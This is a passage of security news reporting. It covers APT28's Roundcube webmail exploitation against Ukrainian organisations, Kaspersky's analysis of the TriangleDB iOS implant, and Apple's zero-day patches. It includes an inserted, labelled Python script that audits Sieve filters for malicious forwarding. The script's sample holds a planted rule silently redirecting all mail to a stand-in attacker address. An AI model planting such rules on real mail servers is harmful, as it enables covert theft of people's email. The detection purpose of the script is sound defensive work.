“Malware campaigns, especially botnets, are always looking for ways to expand. Exploiting recently discovered (or published) vulnerabilities has always been one of their favored methods, as we highlighted above for the Condi botnet.” concludes the report. “Thus, it is strongly recommended to always apply the latest security patches and updates as soon as possible.”
Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations.
A joint investigation conducted by Ukraine’s Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations.
The group operates out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
In the recent campaign, the threat actors used news about the ongoing conflict between Russia and Ukraine as bait. The cyber spies sent crafted emails to the target organizations; when a recipient opened a message in Roundcube Webmail, vulnerabilities in the webmail software (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) were triggered, allowing the attackers to compromise vulnerable servers.
“during the investigation of the contents of the mailbox of the computer user, an e-mail with the subject “News of Ukraine” was discovered, received on 12.05.2023 from the address “ukraine_news@meta[.]ua”, which contained bait content in the form of an article from the publication “NV” (nv.ua), as well as an exploit for the vulnerability in Roundcube CVE-2020-35730 (XSS) and the corresponding JavaScript code designed to load and run additional JavaScript files: “q.js” and “e.js”.” reads the report published by CERT-UA. “Among the mentioned files, “e.js” provides the creation of a “default filter” filter for redirecting incoming e-mails to a third-party e-mail address, and also performs exfiltration using HTTP POST requests: address book, session values (Cookie) and victim’s e-mail messages.”
BlueDelta Outlook and Roundcube spearphishing infection chain overlap (source: Insikt Group)
The state-sponsored hackers were able to deploy scripts that redirect incoming emails to an address under their control and to steal Roundcube data by exploiting a SQL injection issue tracked as CVE-2021-44026.
One of the scripts, “c.js”, contained an exploit for the CVE-2020-12641 vulnerability.
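The forwarding rule that e.js plants is the part of this chain that keeps working after the session is gone, and it is also the part a mail administrator can audit server-side. The script below is an added example, not code from CERT-UA or Recorded Future. It assumes the victims managed filters through Roundcube's managesieve plugin, which stores each user's rules as a Sieve script with a `# rule:[name]` comment before every rule; the Sieve script and the internal-domain list are constructed, with the rule name "default filter" taken from the CERT-UA quote.

```python
"""Audit Roundcube (managesieve) filter scripts for silent forwarding rules like
the "default filter" that APT28's e.js created.

Added example, not code from CERT-UA or Recorded Future. Assumption: filters are
stored as Sieve scripts in the layout Roundcube's managesieve plugin writes.
"""
import re

# Assumed: the organisation's own mail domains; anything else counts as external.
INTERNAL_DOMAINS = {"example.gov.ua"}

# Constructed script: one legitimate folder rule, one attacker-planted redirect,
# one legitimate internal forward.
SAMPLE_SIEVE = '''require ["fileinto","copy"];
# rule:[Newsletters]
if header :contains "from" "news@example.gov.ua"
{
    fileinto "INBOX.Newsletters";
}
# rule:[default filter]
if true
{
    redirect :copy "collector@attacker.example";
}
# rule:[Team forward]
if address :is "to" "team@example.gov.ua"
{
    redirect "alias@example.gov.ua";
}
'''

RULE_RE = re.compile(r"^# rule:\[(?P<name>[^\]]*)\][ \t]*$", re.M)
REDIRECT_RE = re.compile(r'\bredirect\b(?P<tags>(?:\s+:\w+)*)\s+"(?P<addr>[^"]+)"')


def split_rules(script):
    """Yield (rule name, rule body) for every '# rule:[...]' block in the script."""
    marks = list(RULE_RE.finditer(script))
    for i, m in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(script)
        yield m.group("name"), script[m.end():end]


def suspicious_redirects(script, internal_domains=INTERNAL_DOMAINS):
    """Return (rule name, destination, reasons) for each redirect that needs review."""
    findings = []
    for name, body in split_rules(script):
        for rm in REDIRECT_RE.finditer(body):
            addr = rm.group("addr")
            domain = addr.rsplit("@", 1)[-1].lower()
            reasons = []
            if domain not in internal_domains:
                reasons.append("destination outside the organisation")
            if re.search(r"\bif\s+true\b", body):
                reasons.append("unconditional: applies to every incoming message")
            if ":copy" in rm.group("tags"):
                reasons.append(":copy leaves the original in place, so nothing looks missing")
            if reasons:
                findings.append((name, addr, reasons))
    return findings


if __name__ == "__main__":
    for name, addr, reasons in suspicious_redirects(SAMPLE_SIEVE):
        print(f"[{name}] -> {addr}: " + "; ".join(reasons))
```

Run against every user's active script on the mail server, this turns the CERT-UA finding into a fleet-wide check; the internal forward in the sample is deliberately left unreported so the output stays short enough for a human to read.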
According to CERT-UA, this campaign targeted more than 40 Ukrainian organizations, including government entities.
The Recorded Future’s Insikt Group believes that the campaign has been active since November 2021.
“Based on the targeting and geopolitical backdrop and the group’s organizational links, the highlighted BlueDelta activity was likely intended to enable military intelligence-gathering to support Russia’s invasion of Ukraine. Infrastructure related to BlueDelta activity has likely been operational since at least November 2021.” states Recorded Future. “This infrastructure was identified by Insikt Group via Recorded Future® Malicious Traffic Analysis (MTA) which surfaced multiple Ukrainian entities, including government institutions, communicating with this BlueDelta infrastructure. Organizations within Ukraine are likely the primary targets of this activity.”
According to Recorded Future researchers, this campaign overlaps with previous APT28 attacks that exploited the Microsoft Outlook zero-day tracked as CVE-2023-23397 against European organizations.
Both the CERT-UA and the Insikt Group reports include Indicators of Compromise (IoCs) for this campaign.
In early June, the researchers from the Russian firm Kaspersky uncovered a previously unknown APT group that is targeting iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation.
The experts discovered the attack while monitoring the network traffic of their own corporate Wi-Fi network dedicated to mobile devices using the Kaspersky Unified Monitoring and Analysis Platform (KUMA).
According to Kaspersky researchers, Operation Triangulation began at least in 2019 and is still ongoing.
Each attack chain begins with a message sent via the iMessage service to an iOS device. The message carries an attachment containing an exploit. The experts explained that the message triggers a remote code execution vulnerability without any user interaction (zero-click).
Shortly after Kaspersky’s disclosure, Russia’s FSB accused US intelligence of being behind the attacks on iPhones. According to Russian intelligence, thousands of iOS devices belonging to domestic subscribers and to diplomatic missions and embassies have been targeted as part of Operation Triangulation.
The operations aimed at gathering intelligence from diplomats from NATO countries, Israel, China and Syria.
FSB believes that Apple supported US intelligence in this cyberespionage campaign.
Kaspersky initially reported that the exploit used in the attack downloads multiple subsequent stages from the C2 server, including additional exploits for privilege escalation. The final payload is downloaded from the same C2 and is described by Kaspersky as a fully-featured APT platform.
Then the initial message and the exploit in the attachment are deleted.
The researchers noticed that the malicious toolset does not support persistence, likely due to the limitations of the OS. The devices may have been reinfected after rebooting.
The attack successfully targeted iOS 15.7; the analysis of the final payload had yet to be finished at the time. The malicious code runs with root privileges, supports a set of commands for collecting system and user information, and can run arbitrary code downloaded as plugin modules from the C2 server.
Today Kaspersky announced that after a six-month-long investigation, they have completed the collection of all the components of the attack chain and the analysis of the spyware implant, tracked as TriangleDB.
The attackers exploit a kernel vulnerability to obtain root privileges on the target iOS device and install the implant. The spyware is deployed directly in memory and does not survive a reboot. Even without a reboot, the implant uninstalls itself after 30 days unless the attackers extend that period.
TriangleDB is written in Objective-C; once executed, it connects to the C2 server and exchanges data serialized with the Protobuf library.
The implant configuration contains two servers, the primary one and the fallback.
The messages are encrypted with a combination of symmetric (3DES) and asymmetric (RSA) cryptography and are exchanged over HTTPS in POST requests.
The malware periodically sends heartbeat beacons to the C2, they contain system information such as the implant version, device identifiers (IMEI, MEID, serial number, etc.) and the configuration of the update daemon (whether automatic downloads and installations of updates are enabled).
In turn, the C2 server responds by sending commands to the implant.
“Commands are transferred as Protobuf messages that have type names starting with CRX.” reads the analysis published by Kaspersky. “In total, the implant we analyzed has 24 commands designed for:
Interacting with the filesystem (creation, modification, exfiltration and removal of files);
Interacting with processes (listing and terminating them);
Dumping the victim’s keychain items, which can be useful for harvesting victim credentials;
Monitoring the victim’s geolocation;
Running additional modules, which are Mach-O executables loaded by the implant. These executables are reflectively loaded, with their binaries stored only in memory.”
The analysis of the code revealed that the authors refer to string decryption as “unmunging” (the method performing it is named +[CRConfig unmungeHexString:]). The experts also observed that different entities were given names borrowed from database terminology, which is why they called the implant TriangleDB.
The researchers also noticed that the class CRConfig, which stores the implant’s configuration, has a method named populateWithFieldsMacOSOnly. The method is not invoked in the iOS implant, but the name suggests the existence of a macOS version of the malware.
Kaspersky is still analyzing this campaign; in the meantime, it has shared indicators of compromise (IoCs) for TriangleDB.
Recently, Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed to deliver the spyware to iOS devices.
Below are the descriptions of the two issues addressed by Apple:
CVE-2023-32434 – An integer overflow in the Kernel, addressed with improved input validation. An app may be able to trigger the vulnerability to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
CVE-2023-32435 – A memory corruption vulnerability in WebKit that can be exploited to achieve arbitrary code execution when processing specially crafted web content. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Both issues have been reported by Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky.
Today Apple released updates for CVE-2023-32434 (Kernel) and CVE-2023-32435 (WebKit) in-the-wild zero-days which were discovered by us (@kucher1n, @bzvr_ and yours truly) in the #iOSTriangulation attacks. Update your iOS/iPadOS/macOS/watchOS now!
Another zero-day fixed by Apple in the same release, not reported as part of Operation Triangulation, is an arbitrary code execution flaw tracked as CVE-2023-32439 that is triggered by processing web content. The company addressed the vulnerability with improved checks.
“Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.” reads the advisory published by the company.